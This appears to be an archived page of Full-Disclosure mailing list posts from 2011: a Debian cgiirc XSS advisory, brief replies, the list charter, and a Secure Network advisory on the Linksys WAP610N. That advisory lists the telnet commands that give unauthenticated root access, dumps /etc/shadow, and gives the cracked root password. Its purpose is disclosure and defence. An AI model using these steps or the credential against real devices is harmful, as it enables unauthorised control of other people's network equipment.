You've misread my statement, I didn't say floating point is trivial.
I actually said securing a base data type is trivial.

I'd give you credit if this was a complex issue in, say, deserializing some
complex type, but not float.

How many simple types does PHP have? Integer, float, string and boolean.
Keep in mind that when we talk about floating point in PHP, we're talking
about The Float (64bit || 32bit), not tens of different floating types
ranging from 8 bits to 1024...

Cheers,
Chris.





[Full-disclosure] [SECURITY] [DSA-2158-1] cgiirc security update

2011-02-09 Thread Steve Kemp
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


- 
Debian Security Advisory DSA-2158-1  secur...@debian.org
http://www.debian.org/security/   Steve Kemp
February 9, 2011  http://www.debian.org/security/faq
- 

Package: cgiirc
Vulnerability  : cross-site scripting
Problem type   : local
Debian-specific: no
CVE ID : CVE-2011-0050

Michael Brooks (Sitewatch) discovered a reflective XSS flaw in
cgiirc, a web based IRC client, which could lead to the execution
of arbitrary javascript.

For the old-stable distribution (lenny), this problem has been fixed in
version 0.5.9-3lenny1.

For the stable distribution (squeeze), and unstable distribution (sid),
this problem will be fixed shortly.

We recommend that you upgrade your cgiirc packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



Re: [Full-disclosure] {Java,PHP} Server Exploits

2011-02-09 Thread DiKKy Heartiez

Breakin' fuckin' news!  (Or not!)  One of those stories is over a month old, 
the other is over a week old.  Nothing particularly exciting or unexpected in 
either.  It's just typical GPL code quality.


[Full-disclosure] Linksys WAP610N Unauthenticated Root Console

2011-02-09 Thread Matteo Ignaccolo
Secure Network - Security Research Advisory

Vuln name: Linksys WAP610N Unauthenticated Access With Root Privileges
Systems affected: WAP610N (Firmware Version: 1.0.01)
Systems not affected: --
Severity: High
Local/Remote: Remote
Vendor URL: http://www.linksysbycisco.com
Author(s): Matteo Ignaccolo m.ignacc...@securenetwork.it
Vendor disclosure: 14/06/2010
Vendor acknowledged: 14/06/2010
Vendor bugfix: 14/12/2010 (reply to our request for update)
Vendor patch release: ??
Public disclosure: 10/02/2010
Advisory number: SN-2010-08
Advisory URL: 
http://www.securenetwork.it/ricerca/advisory/download/SN-2010-08.txt


*** SUMMARY ***

Linksys WAP610N is a SOHO wireless access point supporting 802.11n draft.

An unauthenticated remote text-based administration console has been found that
allows an attacker to run system commands as the root user.


*** VULNERABILITY DETAILS ***

telnet <access-point IP>

Command system id
Output  uid=0(root) gid=0(root)

Command system cat /etc/shadow
Output  root:$1$ZAwqf2dI$ZukbihyQtUghNDsLAQaP31:10933:0:9:7:::
Output  bin:*:10933:0:9:7:::
Output  daemon:*:10933:0:9:7:::
Output  adm:*:10933:0:9:7:::
Output  lp:*:10933:0:9:7:::
Output  sync:*:10933:0:9:7:::
Output  shutdown:*:10933:0:9:7:::
Output  halt:*:10933:0:9:7:::
Output  uucp:*:10933

root password is wlan (cracked with MDcrack http://mdcrack.openwall.net)

List of console's command:

ATHENA_READ
ATHENA_WRITE
CHIPVAR_GET
DEBUGTABLE
DITEM
DMEM
DREG16
DREG32
DREG8
DRV_CAT_FREE
DRV_CAT_INIT
DRV_NAME_GET
DRV_VAL_GET
DRV_VAL_SET
EXIT
GENIOCTL
GETMIB
HELP
HYP_READ   
HYP_WRITE  
HYP_WRITEBUFFER
ITEM16
ITEM32
ITEM8
ITEMLIST
MACCALIBRATE
MACVARGET
MACVARSET
MEM_READ
MEM_WRITE
MTAPI
PITEMLIST
PRINT_LEVEL
PROM_READ
PROM_WRITE
READ_FILE
REBOOT
RECONF
RG_CONF_GET
RG_CONF_SET
RG_SHELL
SETMIB
SHELL
STR_READ
STR_WRITE
SYSTEM
TEST32
TFTP_GET
TFTP_PUT
VER


*** EXPLOIT ***

Attackers may exploit these issues through a common telnet client as explained 
above.


*** FIX INFORMATION ***

No patch is available.

*** WORKAROUNDS ***

Put access points on a separate wired network and filter network traffic to/from 
 tcp port.


*
*** LEGAL NOTICES ***
*

Secure Network (www.securenetwork.it) is an information security company, 
which provides consulting and training services, and engages in security 
research and development. 

We are committed to open, full disclosure of vulnerabilities, cooperating
whenever possible with software developers for properly handling disclosure.

This advisory is copyright 2009 Secure Network S.r.l. Permission is 
hereby granted for the redistribution of this alert, provided that it is
not altered except by reformatting it, and that due credit is given. It 
may not be edited in any way without the express consent of Secure Network 
S.r.l. Permission is explicitly given for insertion in vulnerability 
databases and similars, provided that due credit is given to Secure Network.

The information in the advisory is believed to be accurate at the time of 
publishing based on currently available information. This information is
provided as-is, as a free service to the community by Secure Network 
research staff. There are no warranties with regard to this information. 
Secure Network does not accept any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

If you have any comments or inquiries, or any issue with what is reported 
in this advisory, please inform us as soon as possible.

E-mail: securenetw...@securenetwork.it
GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc
Phone: +39 02 24 12 67 88



Re: [Full-disclosure] {Java,PHP} Server Exploits

2011-02-09 Thread Troy Aerojam
It borders idiocy this hasn't been plugged.

Aerojam


[Full-disclosure] List Charter

2011-02-09 Thread John Cartwright

[Full-Disclosure] Mailing List Charter
John Cartwright jo...@grok.org.uk
 

- Introduction & Purpose -

This document serves as a charter for the [Full-Disclosure] mailing 
list hosted at lists.grok.org.uk.

The list was created on 9th July 2002 by Len Rose, and is primarily 
concerned with security issues and their discussion.  The list is 
administered by John Cartwright.

The Full-Disclosure list is hosted and sponsored by Secunia.


- Subscription Information -

Subscription/unsubscription may be performed via the HTTP interface 
located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure.

Alternatively, commands may be emailed to 
full-disclosure-requ...@lists.grok.org.uk, send the word 'help' in 
either the message subject or body for details.

 
- Moderation & Management -

The [Full-Disclosure] list is unmoderated. Typically posting will be
restricted to members only, however the administrators may choose to 
accept submissions from non-members based on individual merit and 
relevance.

It is expected that the list will be largely self-policing, however in
special circumstances (eg spamming, misappropriation) then offending 
members may be removed from the list by the management.

An archive of postings is available at 
http://lists.grok.org.uk/pipermail/full-disclosure/.
 

- Acceptable Content -

Any information pertaining to vulnerabilities is acceptable, for 
instance announcement and discussion thereof, exploit techniques and 
code, related tools and papers, and other useful information.

Gratuitous advertisement, product placement, or self-promotion is 
forbidden.  Disagreements, flames, arguments, and off-topic discussion 
should be taken off-list wherever possible.

Humour is acceptable in moderation, providing it is inoffensive. 
Politics should be avoided at all costs.

Members are reminded that due to the open nature of the list, they 
should use discretion in executing any tools or code distributed via
this list.
 

- Posting Guidelines -

The primary language of this list is English. Members are expected to 
maintain a reasonable standard of netiquette when posting to the list. 

Quoting should not exceed that which is necessary to convey context, 
this is especially relevant to members subscribed to the digested 
version of the list.

The use of HTML is discouraged, but not forbidden. Signatures will 
preferably be short and to the point, and those containing 
'disclaimers' should be avoided where possible.

Attachments may be included if relevant or necessary (e.g. PGP or 
S/MIME signatures, proof-of-concept code, etc) but must not be active 
(in the case of a worm, for example) or malicious to the recipient.

Vacation messages should be carefully configured to avoid replying to 
list postings. Offenders will be excluded from the mailing list until 
the problem is corrected.

Members may post to the list by emailing 
full-disclosure@lists.grok.org.uk. Do not send subscription/
unsubscription mails to this address, use the -request address 
mentioned above.


- Charter Additions/Changes -

The list charter will be published at 
http://lists.grok.org.uk/full-disclosure-charter.html.

In addition, the charter will be posted monthly to the list by the 
management.

Alterations will be made after consultation with list members and a 
consensus has been reached.
